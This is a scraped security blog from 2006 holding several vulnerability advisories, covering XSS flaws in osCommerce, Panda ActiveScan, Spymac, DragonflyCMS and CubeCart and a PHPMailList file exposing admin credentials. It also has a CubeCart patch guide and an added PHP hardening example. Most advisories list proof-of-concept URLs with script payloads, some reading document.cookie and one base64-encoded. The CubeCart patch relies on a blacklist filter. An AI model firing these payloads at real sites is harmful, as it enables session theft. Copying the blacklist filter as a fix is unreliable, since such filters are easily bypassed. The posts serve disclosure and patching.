Milestone 2 Update 060817<br /><br />####################<br />SOLUTION<br />####################<br /><br />No solution was available at this time.<br /><br /><br />#######################<br />VULNERABLE CODE<br />#######################<br /><br />Around line 30 in banner_manager.php we have:<br /><br /><br />tep_redirect(tep_href_link(FILENAME_BANNER_MANAGER,<br /> 'page=' . $HTTP_GET_VARS['page'] . '&bID=' .<br /> $HTTP_GET_VARS['bID']));<br /><br /><br /><br />The page parameter is used directly, without sanitisation.<br />Around line 115 there is a similar situation:<br />the page parameter is read from the GET request without any sanitisation.<br /><br />All of the vulnerable scripts have the same situation,<br />with slightly different code.<br /><br />####################<br />vulnerable scripts<br />####################<br /><br />admin/banner_manager.php<br />admin/banner_statistics.php<br />admin/countries.php<br />admin/currencies.php<br />admin/languages.php<br />admin/manufacturers.php<br />admin/newsletters.php<br />admin/orders_status.php<br />admin/products_attributes.php<br />admin/products_expected.php<br />admin/reviews.php<br />admin/specials.php<br />admin/stats_products_purchased.php<br />admin/stats_products_viewed.php<br />admin/tax_classes.php<br />admin/tax_rates.php<br />admin/zones.php<br /><br />####################<br />Timeline<br />####################<br /><br />Discovered: 27-09-2006<br />Vendor notify:03-10-2006<br />Vendor response:------<br />Vendor fix:--------<br />Disclosure: 03-10-2006 (vendor Bugtracker)<br />Public disclosure:04-10-2006<br /><br />####################<br />EXAMPLES<br />####################<br /><blockquote><br />http://localhost/catalog/admin/banner_manager.php?page=1[XSS-code]<br />http://localhost/catalog/admin/banner_statistics.php?page=1[XSS-code]<br />http://localhost/catalog/admin/countries.php?page=1[XSS-code]<br />http://localhost/catalog/admin/currencies.php?page=1[XSS-code]<br />http://localhost/catalog/admin/languages.php?page=1[XSS-code]<br />http://localhost/catalog/admin/manufacturers.php?page=1[XSS-code]<br />http://localhost/catalog/admin/newsletters.php?page=1[XSS-code]<br />http://localhost/catalog/admin/orders_status.php?page=1[XSS-code]<br />http://localhost/catalog/admin/products_attributes.php?page=1[XSS-code]<br />http://localhost/catalog/admin/products_expected.php?page=1[XSS-code]<br />http://localhost/catalog/admin/reviews.php?page=1[XSS-code]<br />http://localhost/catalog/admin/specials.php?page=1[XSS-code]<br />http://localhost/catalog/admin/stats_products_purchased.php?page=1[XSS-code]<br />http://localhost/catalog/admin/stats_products_viewed.php?page=1[XSS-code]<br />http://localhost/catalog/admin/tax_classes.php?page=1[XSS-code]<br />http://localhost/catalog/admin/tax_rates.php?page=1[XSS-code]<br />http://localhost/catalog/admin/zones.php?page=1[XSS-code]<br /><br />This is a simple evil URL, but we can build a more elaborate one<br />in conjunction with other files that are not themselves vulnerable,<br />like this:<br /><br /><br /><br />http://localhost/catalog/admin/categories.php?action=new_product_preview<br />&read=only&pID=12&origin=stats_products_viewed.php?page=2[XSS-code]<br /><br /></blockquote><br /><br />######################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
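An added example for the 'page' parameter flaw above; it is not osCommerce code. It places the link-building pattern quoted in the VULNERABLE CODE section (the raw GET value concatenated into the query string) beside a version that treats 'page' as the integer it is meant to be. build_link_vulnerable(), build_link_fixed() and html_link() are assumptions standing in for tep_href_link() and its callers, and the script name stands in for FILENAME_BANNER_MANAGER.

```php
<?php
// Added example, not osCommerce code. build_link_* and html_link are assumptions
// standing in for tep_href_link() and its callers; 'banner_manager.php' stands in
// for FILENAME_BANNER_MANAGER.

// Vulnerable pattern: whatever arrives in ?page= ends up in the href, and from
// there in the HTML (or in the Location header when the link feeds a redirect).
function build_link_vulnerable(string $script, array $get): string
{
    return $script . '?page=' . $get['page'] . '&bID=' . $get['bID'];
}

// Hardened: pagination values are validated as positive integers before use.
// Anything else (including "1"><script>...") falls back to the default page.
function page_number($value, int $default = 1): int
{
    if (is_string($value) && ctype_digit($value) && $value !== '0' && strlen($value) <= 9) {
        return (int) $value;
    }
    return $default;
}

// The query string is built with http_build_query(), which URL-encodes every
// value, so even a non-numeric parameter could not break out of the URL.
function build_link_fixed(string $script, array $get): string
{
    $query = http_build_query([
        'page' => page_number($get['page'] ?? null),
        'bID'  => page_number($get['bID'] ?? null),   // bID is a record id, also numeric
    ]);
    return $script . '?' . $query;
}

// When the URL is written into markup it is attribute-encoded as well,
// so the '&' between parameters becomes '&amp;' and quotes cannot close the attribute.
function html_link(string $href, string $text): string
{
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">' . $text . '</a>';
}

// Constructed request in the shape of the advisory's examples: ?page=1[XSS-code]
$get = ['page' => '1"><script>alert(1)</script>', 'bID' => '7'];

$vulnerable = '<a href="' . build_link_vulnerable('banner_manager.php', $get) . '">next</a>';
$fixed      = html_link(build_link_fixed('banner_manager.php', $get), 'next');

echo "vulnerable: $vulnerable\n";   // the attribute is closed and the script tag lands in the page
echo "fixed:      $fixed\n";        // page is forced back to 1; nothing of the payload reaches the markup
```

Run it with `php page_param.php`. The numeric check is the part that removes the whole class of bug across the seventeen scripts listed above: once 'page' can only ever be an integer, no later sink (link, redirect, SQL LIMIT clause) has to worry about it. The attribute encoding in html_link() is still needed for the other parameters that legitimately carry text.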
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1155145672662398342006-08-09T10:43:00.000-07:002006-10-08T06:33:41.190-07:00Panda ActiveScan XSS vulnerability################################################<br />Panda ActiveScan XSS vulnerability<br />Vendor url:http://www.pandasoftware.es or .com<br />Advisory:http://lostmon.blogspot.com/2006/08/<br />panda-activescan-xss-vulnerability.html<br />vendor notify:yes exploit available:yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=29147" target="_blank">29147</a><br />Securitytracker:<a href="http://securitytracker.com/id?1016696" target="_BLANK">1016696</a><br />BID:<a href="http://www.securityfocus.com/bid/19471" target="_BLANK">19471</a><br />################################################<br /><br />Panda ActiveScan contains a flaw that allows a remote cross-site<br />scripting attack. The flaw exists because the application does<br />not validate the 'email' variable upon submission to the ascan_6.asp<br />script. This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within the<br />trust relationship between the browser and the server, leading<br />to a loss of integrity.<br /><br />##########<br />versions:<br />##########<br /><br />Panda ActiveScan 5.53.00<br /><br />##########<br />Solution:<br />##########<br /><br />Panda released a new version of ActiveScan<br />on 14-08-2006<br /><br />#########<br />timeline:<br />#########<br /><br />discovered : 01-08-2006<br />vendor notify :05-08-2006<br />vendor response :14-08-2006<br />vendor fix:14-08-2006<br />disclosure:09-08-2006<br /><br />################<br />test<br />################<br /><br /><br /><br />http://www.pandasoftware.com/activescan/activescan/<br />ascan_6.asp?IdLang=2&Idvendor=17490&Idpais=63&email=<br />Lostmon@gmail.com%22%3E%3Cscript%3Ealert%28%27XSS%20<br />Vulnerability%27%29%3C/script%3E%26&pais=62&<br />provincia=9&tipousuario=0&enviar=1&ode=0#<br /><br /><br />######################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1152120730781841272006-07-05T10:31:00.000-07:002006-08-12T09:16:42.746-07:00Multiple Vulnerabilities in PHPMailList 1.8.0########################################################<br />Multiple Vulnerabilities in PHPMailList 1.8.0 <br />Vendor url: http://php.warpedweb.net/ <br />Advisory:http://lostmon.blogspot.com/2006/07/<br />multiple-vulnerabilities-in.html<br />Vendor notify:yes Exploit included:yes<br />osvdb id:<a href="http://osvdb.org/displayvuln.php?osvdb_id=27016" TARGET="_blank">27016</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=27017" TARGET="_blank">27017</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=27018" TARGET="_blank">27018</a><br />Securitytracker:<a href="http://securitytracker.com/id?1016439" target="_BLANK">1016439</a><br />BID:<a href="http://www.securityfocus.com/bid/18840" target="_BLANK">18840</a><br />FrSIRT: <a href="http://www.frsirt.com/english/advisories/2006/2690" target="_BLANK">FrSIRT/ADV-2006-2690</a><br />########################################################<br /><br />################<br />Description<br />################<br /><br />PHPMailList is a powerful, yet simple to use, email announcement script. <br />It allows people to subscribe/unsubscribe through a web-based form, <br />checking for valid addresses. The web-based administration module allows<br />the owner to send messages to the list, subscribe/unsubscribe people,<br />view the list of subscribers, and configure the script. Installation is<br />simple, and configuration of confirmation messages, welcome messages <br />and goodbye messages, as well as signatures, are all maintained through<br />the password-protected administration section.<br /><br />PHPMailList has multiple vulnerabilities: XSS, information disclosure<br />and plain-text administrator username/password disclosure.<br /><br />##############<br />versions<br />##############<br /><br />PHPMailList 1.8.0 and prior versions<br /><br /><br />#####################<br />Cross site scripting<br />##################### <br /><br />PHPMailList has a flaw that allows a remote cross-site scripting attack.<br />The flaw exists because the application does not properly validate the<br />input passed in the email field upon submission to the '/maillist.php'<br />script. This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />######################<br />Information disclosure<br />######################<br /><br />A direct request to the file 'list.dat' reveals the email addresses of all subscribers.<br /><br />A direct request to the file 'ml_config.dat' reveals all configuration information.<br /><br />#####################################<br />Plain text administrator disclosure: <br />#####################################<br /><br />A direct request to the file 'ml_config.dat' reveals the admin username<br />on the first line and the admin password on the second, both in plain text.<br /><br />######################<br />Timeline<br />######################<br /><br />Discovered: 06-jun-2006<br />Vendor notify: the vendor has no forum and no mail address...<br />vendor response:-------<br />Disclosure:06-jul-2006<br /><br />######################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1147890126445659102006-05-17T11:20:00.000-07:002006-06-10T01:47:19.243-07:00Multiple Cross site scripting in Spymac WOS V##########################################################<br />Multiple Cross site scripting in Spymac WOS V<br />Vendor url: http://www.spymac.com<br />Advisory:http://lostmon.blogspot.com/2006/05/<br />multiple-cross-site-scripting-in.html<br />Vendor notify: yes Exploit available: yes<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=25925" target="_BLANK">25925</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=25926" target="_BLANK">25926</a>,<a href="http://osvdb.org/displayvuln.php?osvdb_id=25927" target="_BLANK">25927</a><br />Securitytracker:<a href="http://securitytracker.com/id?1016116" target="_BLANK">1016116</a><br /><a href="http://www.frsirt.com/english/advisories/2006/1852" target="_BLANK">FrSIRT/ADV-2006-1852</a><br />##########################################################<br /><br /><br />Spymac WOS is powered by an integrated collection of Web<br />and desktop applications that together form "Spymac WOS".<br />Developed in-house, Spymac WOS is an intelligent environment<br />featuring patent-pending technology that allows for the creation<br />of an immersive and visually-stunning Web experience.<br /><br />Spymac has a flaw that allows a remote cross-site scripting attack.<br />The flaw exists because the application does not validate <br />multiple variables upon submission to multiple scripts.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />#######################<br />Versions<br />#######################<br /><br />Spymac WOS V<br /><br /><br />########################<br />Solution:<br />########################<br /><br />No solution was available at this time.<br /><br /><br />########################<br />Examples<br />########################<br /><br />To view some of these examples you need a client login.<br />http://[VICTIM]/notes/index.php?action=delete_folder&del_folder=[XSS-CODE]<br />http://[VICTIM]/notes/index.php?action=empty_trash[XSS-CODE]<br />http://[VICTIM]/ipod/get_ipod.php?curr=10[XSS-CODE]<br />http://[VICTIM]/notes/index.php?action=noteform&nick=Lostmon[XSS-CODE]<br /><br /><br />http://[VICTIM]/login.php?[XSS-CODE]<br /><br /><br />Some other variables are susceptible to the same flaw.<br /><br /><br /><br />########################<br />TIMELINE<br />########################<br /><br />Discovered:02-05-2006 <br />Vendor notify:14-05-2006<br />Vendor response:-------------<br />Disclosure:17-05-2006<br /><br /><br />######################## €nd #####################<br /><br />Thanks to Estrella for being my light.<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1140606821123085472006-02-22T03:13:00.000-08:002006-02-24T02:47:54.536-08:00Multiple Cross site scripting in dragonflycms######################################################<br />
Multiple Cross site scripting in dragonflycms 9.0.6.1<br />
Vendor url: http://dragonflycms.org/<br />
Advisory: http://lostmon.blogspot.com/2006/02/multiple-cross-site-scripting-in.html<br />
Vendor notified: Exploit available: yes<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=23408" target="_BLANK">23408</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=23409" target="_BLANK">23409</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=23410" target="_BLANK">23410</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=23411" target="_BLANK">23411</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=23412" target="_BLANK">23412</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=23413" target="_BLANK">23413</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=23414" target="_BLANK">23414</a>, <a href="http://osvdb.org/displayvuln.php?osvdb_id=23415" target="_BLANK">23415</a><br />
Securitytracker: <a href="http://securitytracker.com/id?1015661" target="_BLANK">1015661</a><br />
Secunia: <a href="http://secunia.com/advisories/18940/" target="_BLANK">18940</a><br />
BID: <a href="http://www.securityfocus.com/bid/16784" target="_BLANK">16784</a><br />
FrSIRT: <a href="http://www.frsirt.com/english/advisories/2006/0688" target="_BLANK">ADV-2006-0688</a><br />
######################################################<br /><br />
Description:<br /><br />
"Dragonfly CMS is a powerful, feature-rich, Open Source<br />
content management system (CMS) based on PHP-Nuke 6.5.<br />
We have spent over a year developing Dragonfly CMS,<br />
paying close attention to security and reliability. The<br />
release of Dragonfly marks yet another exciting milestone<br />
in our history."<br /><br />
CPG Dragonfly is vulnerable to cross site scripting that<br />
allows attackers to steal information from users by adding<br />
JavaScript code via some of the parameters used by the CMS<br />
product.<br /><br /><br />
######################<br />
Versions<br />
######################<br /><br />
prior to Dragonfly 9.0.6.1<br /><br />
#########################<br />
Solution<br />
########################<br /><br />
No solution was available at this time.<br /><br />
##########################<br />
Timeline<br />
##########################<br /><br />
Discovered: 12-02-2006<br />
Vendor notified: 20-02-2006 (web form "contact us")<br />
Vendor response: ---------<br />
Disclosure: 22-02-2006<br /><br /><br />
#############################<br />
XSS in module 'Your_Account'<br />
#############################<br /><br />
http://[Victim]/index.php?name=Your_Account&error=1&uname=bGFsYWxh"><script>alert(document.cookie)</script><br /><br />
http://[Victim]/index.php?name=Your_Account&error=1"><script>alert(document.cookie)</script>&uname=bGFsYWxh<br /><br />
http://[Victim]/index.php?name=Your_Account&profile=3"><script>alert(document.cookie)</script><br /><br /><br />
http://[Victim]/index.php?name=Your_Account&error=1&uname=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+<br /><br /><br />
This value, PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+,<br />
is "><script>alert(document.cookie)</script> in base64:<br />
a base64 cross site scripting, where the XSS code is passed encoded in base64.<br /><br />
The username field is vulnerable too:<br />
insert <script>alert()</script> in the box<br />
and this code is executed...<br /><br />
#######################<br />
XSS in module 'News'<br />
#######################<br /><br />
http://[Victim]/index.php?name=News&catid=1"><script>alert()</script><br /><br />
http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script><br /><br />
http://[Victim]/index.php?name=News&file=submit<br /><br />
// the textareas 'Story Text' and 'Extended Text' are vulnerable.<br /><br />
http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script><br /><br /><br />
#################################<br />
XSS in module 'Stories_Archive'<br />
#################################<br /><br />
http://[Victim]/index.php?name=Stories_Archive&sa=show_month&year=2005&month=11"><script>alert()</script><br /><br />
http://[Victim]/index.php?name=Stories_Archive&sa=show_month&year=2005"><script>alert()</script>>&month=11<br /><br />
http://[Victim]/index.php?name=Stories_Archive&sa=show_all"><script>alert()</script><br /><br />
###########################<br />
XSS in module 'Web_Links'<br />
###########################<br /><br />
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert(document.cookie)</script><br /><br />
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15"><script>alert()</script><br /><br />
http://[Victim]/index.php?name=Web_Links&l_op=toprated&ratenum=5&ratetype=percent"><script>alert()</script><br /><br />
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15&orderby=titled"><script>alert()</script><br /><br /><br />
###########################<br />
XSS in module 'Surveys'<br />
###########################<br /><br />
http://[Victim]/index.php?name=Surveys&op=results"><script>alert()</script>pollid=3<br /><br />
http://[Victim]/index.php?name=Surveys&op=results&pollid=5"><script>alert()</script><br /><br />
###########################<br />
XSS in module 'Downloads'<br />
###########################<br /><br />
http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script><br /><br />
###########################<br />
XSS in module 'coppermine'<br />
###########################<br /><br />
http://[Victim]/coppermine/thumbnails/meta="><script>alert()</script>topn/album=1.html<br /><br />
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html"><script>alert()</script><br /><br />
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1"><script>alert()</script><br /><br /><br />
############################<br />
XSS in module -Search-<br />
############################<br /><br />
http://[Victim]/index.php?name=Search<br /><br />
User input passed to the search box in the following<br />
modules is not sanitised before being returned to users:<br /><br />
Search<br />
Stories_Archive<br />
Downloads<br />
Topics<br /><br />
If we insert the code "><script>alert()</script> in the search box,<br />
it is executed when we click the Search button.<br /><br />
####################### €nd ############################<br /><br />
Thanks to Estrella for being my light<br />
--<br />
Sincerely:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1138017401918316302006-01-23T03:56:00.000-08:002006-01-23T04:00:27.223-08:00MANUAL FIX FOR CROSS-SITE SCRIPTING Cubecart 3.0.7 pl1########################################################<br />
MANUAL FIX FOR CROSS-SITE SCRIPTING Cubecart 3.0.7 pl1<br />
Vendor entry: http://bugs.cubecart.com/?do=details&id=459<br />
Advisory: http://lostmon.blogspot.com/2006/01/cubecart-307-pl1-indexphp-multiple.html<br />
References:<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=22471" target="_BLANK">22471</a><br />
Secunia: <a href="http://secunia.com/advisories/18519/" target="_BLANK">SA18519</a><br />
BID: <a href="http://www.securityfocus.com/bid/16259" target="_BLANK">16259</a><br />
##########################################################<br /><br />
1- includes/functions.inc.php<br />
2- index.php: fix params 'act' and 'searchStr'<br />
3- fix 'catId' param in includes/content/viewCat.inc.php<br />
4- fix 'productId' param in includes/content/viewProd.inc.php<br />
5- cart.php: fix params 'act' and 'searchStr'<br />
6- fix param 'docId' in includes/content/viewDoc.inc.php<br />
7- fix 'act', 'username', 'password', 'remember' and 'redir' params in includes/content/login.inc.php<br />
8- fix 'productId' and $_POST in includes/content/tellafriend.inc.php<br />
9- Thanks<br />
#############################<br />
1 includes/functions.inc.php<br />
#############################<br /><br />
Open includes/functions.inc.php and look for this code,<br />
around line 82:<br />
-------------------------------------------------------<br />
//////////////////////////////////<br />
// treat GET vars stop XSS<br />
////////<br />
function treatGet($text){<br /><br />
// drop whole <script>...</script> blocks, then any remaining tags<br />
$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");<br />
$text = strip_tags($text);<br />
// strip the characters used to break out of an attribute or tag<br />
$text = str_replace(array("'","\"",">","<","\\"), "", $text);<br />
return $text;<br /><br />
}<br />
---------------------------------------------------------<br /><br />
If your code differs from this, replace it with this version.<br /><br />
#########################################<br />
2- index.php params 'act' and 'searchStr'<br />
#########################################<br /><br />
Open index.php; at line 90 you have this for the 'act' param:<br /><br />
------------------------------<br />
if(isset($_GET['act'])){<br />
switch ($_GET['act']) {<br /><br />
-----------------------------------------<br /><br />
Change it to this:<br /><br />
-------------------------------------------<br /><br />
$_GET['act'] = treatGet($_GET['act']);<br />
if(isset($_GET['act'])){<br />
switch ($_GET['act']) {<br />
---------------------------------------------------<br /><br />
Open index.php; at line 80 you have this for the 'searchStr' param:<br /><br />
-----------------------------------------------------<br /><br />
if(isset($_GET['searchStr'])){<br />
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));<br />
-------------------------------------------------------<br /><br />
Change it to this:<br /><br />
--------------------------------------------<br /><br />
$_GET['searchStr'] = treatGet($_GET['searchStr']);<br />
if(isset($_GET['searchStr'])){<br />
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));<br />
--------------------------------------------------<br /><br />
#######################################################<br />
3- fix 'catId' param in includes/content/viewCat.inc.php<br />
#######################################################<br /><br />
To fix the 'catId' param, open includes/content/viewCat.inc.php<br /><br />
and find this code at line 50:<br /><br />
--------------------------------------------------<br />
if(isset($_GET['catId'])) {<br /><br />
----------------------------------------<br /><br />
Change it to this:<br />
-----------------------------------------<br /><br />
$_GET['catId'] = treatGet($_GET['catId']);<br />
if(isset($_GET['catId'])) {<br /><br />
-----------------------------------------<br /><br />
###################################################<br />
4- fix 'productId' param in includes/content/viewProd.inc.php<br />
####################################################<br /><br />
At line 38 you have:<br /><br />
--------------------------------------------------<br /><br />
// query database<br />
$query = "SELECT productId, productCode, quantity, name, description, image,<br /><br />
-----------------------------------------------------------------<br /><br />
Change it to this:<br /><br />
------------------------------------------------------<br />
// query database<br />
$_GET['productId'] = treatGet($_GET['productId']);<br />
$query = "SELECT productId, productCode, quantity, name, description, image,<br /><br />
---------------------------------------------------------------------<br /><br />
##############################################<br />
5- cart.php: fix params 'act' and 'searchStr'<br />
##############################################<br /><br />
Open cart.php; to fix the 'act' param, look for this code:<br /><br />
-------------------------------------------<br />
// START MAIN CONTENT<br />
switch ($_GET['act']) {<br />
--------------------------------------------<br /><br />
Replace it with this:<br /><br />
---------------------------------------------<br /><br />
// START MAIN CONTENT<br />
$_GET['act'] = treatGet($_GET['act']);<br />
switch ($_GET['act']) {<br />
----------------------------------------------<br /><br />
Around line 69 you have:<br />
--------------------------------<br />
if(isset($_GET['searchStr'])){<br />
$body->assign("SEARCHSTR",$_GET['searchStr']);<br /><br />
------------------------------------------<br /><br />
Change it to:<br /><br />
------------------------------------------<br /><br />
$_GET['searchStr'] = treatGet($_GET['searchStr']);<br />
if(isset($_GET['searchStr'])){<br />
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));<br />
---------------------------------------------<br /><br />
#######################################################<br />
6- fix param 'docId' in includes/content/viewDoc.inc.php<br />
#######################################################<br /><br />
Insert this line at line 36:<br />
--------------------------------------<br />
$_GET['docId'] = treatGet($_GET['docId']);<br />
------------------------------------------<br /><br />
#######################################################<br />
7- fix 'act', 'username', 'password', 'remember' and<br />
'redir' params in includes/content/login.inc.php<br />
#######################################################<br /><br />
Insert these lines at line 35:<br />
---------------------------------------------------------<br /><br />
$_GET['act'] = treatGet($_GET['act']);<br />
$_POST['username'] = treatGet($_POST['username']);<br />
$_POST['password'] = treatGet($_POST['password']);<br />
-----------------------------------------------------------<br /><br />
To fix the 'redir' param, insert this line after line 52:<br /><br />
---------------------------------------------<br />
//"login","reg","unsubscribe","forgotPass"<br />
$_GET['redir'] = treatGet($_GET['redir']);<br />
-------------------------------------------------------------<br /><br />
To fix the 'remember' param, insert this code at line 52:<br /><br />
---------------------------------------------<br /><br />
$_POST['remember'] = treatGet($_POST['remember']);<br /><br />
-------------------------------------------------<br /><br /><br />
######################################<br />
8- fix 'productId' and $_POST in<br />
includes/content/tellafriend.inc.php<br />
######################################<br /><br />
Open includes/content/tellafriend.inc.php<br /><br />
and add this line after line 35 to fix the 'productId' param:<br /><br />
------------------------------<br /><br />
// query database<br />
$_GET['productId'] = treatGet($_GET['productId']);<br /><br />
-------------------------------------------------------<br /><br />
To fix XSS in all the boxes when posting,<br />
around line 58 you have this:<br /><br />
$text = sprintf($lang['front']['tellafriend']['email_body'],$_POST['recipName'],stripslashes($_POST['message']),$GLOBALS['storeURL'],$_GET['productId'],$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);<br /><br /><br /><br />
Change it to this:<br />
----------------------------------------------------<br /><br />
$text = sprintf($lang['front']['tellafriend']['email_body'],treatGet($_POST['recipName']),stripslashes(treatGet($_POST['message'])),$GLOBALS['storeURL'],treatGet($_GET['productId']),$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);<br /><br />
------------------------------------------------------<br /><br />
##########################<br />
9- THANKS<br />
##########################<br /><br />
I want to thank all those who believe in me.<br />
OSVDB (http://www.osvdb.org) for its excellent work.<br />
All the manglers and moderators of OSVDB who believe in this project and work for it :)))<br />
Secunia (http://www.secunia.com) for verifying, publishing and following up on my work, and Securityfocus (http://www.securityfocus.com),<br />
like all those who take care that my work is distributed by different means.<br />
Thanks to all those who are still here and all those who are no longer here.<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1136887696400315512006-01-10T02:06:00.000-08:002006-01-23T03:58:22.420-08:00CubeCart 3.0.7-pl1 index.php multiple variable cross site scripting################################################<br />
CubeCart 3.0.7-pl1 multiple variable Cross site scripting<br />
Vendor url: www.cubecart.com<br />
Bug report: http://bugs.cubecart.com/?do=details&id=459<br />
Advisory: http://lostmon.blogspot.com/2006/01/cubecart-307-pl1-indexphp-multiple.html<br />
Vendor notified: yes Exploit available: yes<br />
OSVDB ID: <a href="http://osvdb.org/displayvuln.php?osvdb_id=22471" target="_BLANK">22471</a><br />
Secunia: <a href="http://secunia.com/advisories/18519/" target="_BLANK">SA18519</a><br />
BID: <a href="http://www.securityfocus.com/bid/16259" target="_BLANK">16259</a><br />
################################################<br /><br />
I recommend that all vendors read this paper<br />
on the new possible impact of XSS attacks:<br /><br />
http://www.bindshell.net/papers/xssv.html<br /><br />
CubeCart contains a flaw that allows a remote cross site scripting<br />
attack. This flaw exists because the application does not validate<br />
some variables upon submission to the 'index.php' script.<br />
This could allow a user to create a specially crafted URL that<br />
would execute arbitrary code in a user's browser within the trust<br />
relationship between the browser and the server, leading to a<br />
loss of integrity.<br /><br />
###############<br />
VERSIONS<br />
###############<br /><br />
CubeCart 3.0.7-pl1 vulnerable.<br />
Other versions are possibly vulnerable too.<br /><br />
#################<br />
Timeline<br />
#################<br /><br />
Discovered: 24 dec 2005<br />
Vendor notified: 10-01-2006<br />
Vendor response:<br />
Solution:<br />
Disclosure: 10-01-2006<br />
Public disclosure: 16-01-2006<br /><br />
###############<br />
Examples:<br />
###############<br /><br /><br />
http://[victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZXdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E<br /><br />
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E<br /><br /><br />
http://[victim]/cc3/index.php?searchStr=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go<br /><br />
http://[victim]/cc3/index.php?act=login&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb2NJZD0x=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E<br /><br />
http://[victim]/cc3/index.php?act=viewProd&productId=1"><script>alert(document.cookie)</script><br /><br />
http://[victim]/cc3/index.php?act=viewDoc&docId=3"><script>alert(document.cookie)</script><br /><br />
http://[victim]/cc3/index.php?act=viewProd"><script>alert(document.cookie)</script><br /><br />
http://[victim]/cc3/index.php?act=viewCat&catId=1"><script>alert(document.cookie)</script><br /><br />
http://[victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>alert(document.cookie)</script><br /><br />
http://[victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat<br /><br />
http://[victim]/cc3/index.php?act=viewDoc&docId=1"><script>alert(document.cookie)</script><br /><br />
#################<br />
User field XSS<br />
#################<br />
Go to http://[victim]/cc3/index.php?act=login<br />
and insert this in the username field: "><script>alert(document.cookie)</script><br /><br />
#############<br />
SOLUTION<br />
#############<br /><br />
No solution was available at this time.<br /><br />
